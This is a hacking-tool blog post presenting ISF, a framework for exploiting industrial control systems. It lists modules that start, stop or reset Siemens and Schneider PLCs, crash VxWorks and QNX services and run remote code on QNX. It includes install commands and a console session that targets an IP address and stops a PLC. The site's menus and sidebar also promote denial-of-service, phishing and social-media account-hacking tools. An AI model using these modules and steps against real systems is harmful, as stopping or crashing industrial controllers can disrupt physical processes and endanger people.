• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2019
  • April
  • 22
  • ISF – Industrial Control System Exploitation Framework

ISF – Industrial Control System Exploitation Framework

April 22, 2019 Comments Off on ISF – Industrial Control System Exploitation Framework
iccsploit industrial control hacks

ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it’s similar to metasploit framework.

ICS Protocol Clients

Name Path Description
modbus_tcp_client icssploit/clients/modbus_tcp_client.py Modbus-TCP Client
wdb2_client icssploit/clients/wdb2_client.py WdbRPC Version 2 Client(Vxworks 6.x)
s7_client icssploit/clients/s7_client.py s7comm Client(S7 300/400 PLC)

Exploit Module

Name Path Description
s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control.py S7-300/400 PLC start/stop
s7_1200_plc_control exploits/plcs/siemens/s7_1200_plc_control.py S7-1200 PLC start/stop/reset
vxworks_rpc_dos exploits/plcs/vxworks/vxworks_rpc_dos.py Vxworks RPC remote dos(CVE-2015-7599)
quantum_140_plc_control exploits/plcs/schneider/quantum_140_plc_control.py Schneider Quantum 140 series PLC start/stop
crash_qnx_inetd_tcp_service exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py QNX Inetd TCP service dos
qconn_remote_exec exploits/plcs/qnx/qconn_remote_exec.py QNX qconn remote code execution
profinet_set_ip exploits/plcs/siemens/profinet_set_ip.py Profinet DCP device IP config

Scanner Module

Name Path Description
profinet_dcp_scan scanners/profinet_dcp_scan.py Profinet DCP scanner
vxworks_6_scan scanners/vxworks_6_scan.py Vxworks 6.x scanner
s7comm_scan scanners/s7comm_scan.py S7comm scanner
enip_scan scanners/enip_scan.py EthernetIP scanner

ICS Protocols Module (Scapy Module)
These protocol can used in other Fuzzing framework like Kitty or create your own client.

Name Path Description
pn_dcp icssploit/protocols/pn_dcp Profinet DCP Protocol
modbus_tcp icssploit/protocols/modbus_tcp Modbus TCP Protocol
wdbrpc2 icssploit/protocols/wdbrpc2 WDB RPC Version 2 Protocol
s7comm icssploit/protocols/s7comm.py S7comm Protocol

Install

Python requirements

  • gnureadline (OSX only)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp
  • python-nmap
  • scapy We suggest install scapy manual with this official document

Install

Python requirements

  • gnureadline (OSX only)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp
  • python-nmap
  • scapy We suggest install scapy manual with this official document

Install on Kali

git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py

Usage

    [email protected]:~/Desktop/temp/isf# python isf.py
    
      _____ _____  _____ _____ _____  _      ____ _____ _______
     |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|
       | || |    | (___| (___ | |__) | |   | |  | || |    | |
       | || |     \___ \\___ \|  ___/| |   | |  | || |    | |
      _| || |____ ____) |___) | |    | |___| |__| || |_   | |
     |_____\_____|_____/_____/|_|    |______\____/_____|  |_|
    
    
                    ICS Exploitation Framework
    
    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0
    
    Exploits: 2 Scanners: 0 Creds: 13
    
    ICS Exploits:
        PLC: 2          ICS Switch: 0
        Software: 0
    
    isf >

Exploits

isf > use exploits/plcs/
exploits/plcs/siemens/  exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >

You can use the tab key for completion.

Options

Display module options:

isf (S7-300/400 PLC Control) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   target                          Target address e.g. 192.168.1.1
   port       102                  Target Port


Module options:

   Name        Current settings     Description
   ----        ----------------     -----------
   slot        2                    CPU slot number.
   command     1                    Command 0:start plc, 1:stop plc.


isf (S7-300/400 PLC Control) >

Set options

isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}

Run module

isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >

Display information about exploit

isf (S7-300/400 PLC Control) > show info

Name:
S7-300/400 PLC Control

Description:
Use S7comm command to start/stop plc.

Devices:
-  Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

Authors:
-  wenzhe zhu <jtrkid[at]gmail.com>

References:

isf (S7-300/400 PLC Control) >

Documents

  • Modbus-TCP Client usage
  • WDBRPCV2 Client usage
  • S7comm Client usage
  • SNMP_bruteforce usage
  • S7 300/400 PLC password bruteforce usage
  • Vxworks 6.x Scanner usage
  • Profient DCP Scanner usage
  • S7comm PLC Scanner usage
  • Profinet DCP Set ip module usage
  • Load modules from extra folder
  • How to write your own module

 

Post navigation

Zeebsploit – Web Scanner, Exploitation and Information Gathering Framework
Top 10 Best IT Podcasts

Related Articles

Yaralyzer - Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors

Yaralyzer – Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors

- Hack Tools
January 29, 2023
SSTImap - Automatic SSTI Detection Tool With Interactive Interface

SSTImap – Automatic SSTI Detection Tool With Interactive Interface

- Hack Tools
January 28, 2023
Octosuite v3.0.4 releases: Advanced Github OSINT Framework

Octosuite v3.0.4 releases: Advanced Github OSINT Framework

- Hack Tools
January 28, 2023
hacker gadgets
hacker phone covers

Recent Posts

Yaralyzer - Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors

Yaralyzer – Visually Inspect And Force Decode YARA And Regex Matches Found In Both Binary And Text Data, With Colors

January 29, 2023
Austrian Resold Drugs Purchased on The Dark Web

Austrian Resold Drugs Purchased on The Dark Web

January 29, 2023
SSTImap - Automatic SSTI Detection Tool With Interactive Interface

SSTImap – Automatic SSTI Detection Tool With Interactive Interface

January 28, 2023
Octosuite v3.0.4 releases: Advanced Github OSINT Framework

Octosuite v3.0.4 releases: Advanced Github OSINT Framework

January 28, 2023
firebaseExploiter: discovers open and exploitable Firebase Database

firebaseExploiter: discovers open and exploitable Firebase Database

January 28, 2023
CISA Warns of Hackers Exploiting CVE-2017-11357 Vulnerability

CISA Warns of Hackers Exploiting CVE-2017-11357 Vulnerability

January 27, 2023

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs

About Us

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Join Our Community!

Please wait...
Get the latest News and Hacking Tools delivered to your inbox.
Don't Worry ! You will not be spammed

Active Members

Submit a Tool

Hackers Handbook 2018


Grab your copy here

ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW